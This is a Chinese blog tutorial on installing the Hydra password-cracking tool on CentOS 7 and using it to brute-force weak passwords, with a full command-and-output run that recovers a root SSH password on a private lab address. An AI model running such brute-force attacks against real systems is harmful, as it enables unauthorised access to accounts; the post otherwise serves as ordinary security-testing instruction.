Hydra(九头蛇)弱口令

2023-03-21  本文已影响0人  eiffel_加油

cenos7安装部署

下载
wget https://github.com/vanhauser-thc/thc-hydra/archive/master.zip
安装必要插件
yum -y install gcc libssh-devel openssl-devel
yum install -y unzip zip
yum install freerdp*
解压
unzip master.zip
进入目录
cd thc-hydra-master/
编译运行
./configure
make &&make install
安装成功
[root@localhost thc-hydra-master]# hydra -h
Hydra v9.5-dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
........省略
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Hydra参数说明

Hydra示例

Hydra对ssh服务弱口令破解
[root@localhost thc-hydra-master]# hydra -l root -p 123456 192.168.1.251 ssh -v
Hydra v9.5-dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 11:41:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.251:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.1.251:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.251:22
[ATTEMPT] target 192.168.1.251 - login "root" - pass "123456" - 1 of 1 [child 0] (0/0)
[22][ssh] host: 192.168.1.251   login: root   password: 123456
[STATUS] attack finished for 192.168.1.251 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 11:41:21
Hydra不支持mysql5.5+的弱口令破解
上一篇 下一篇

猜你喜欢

热点阅读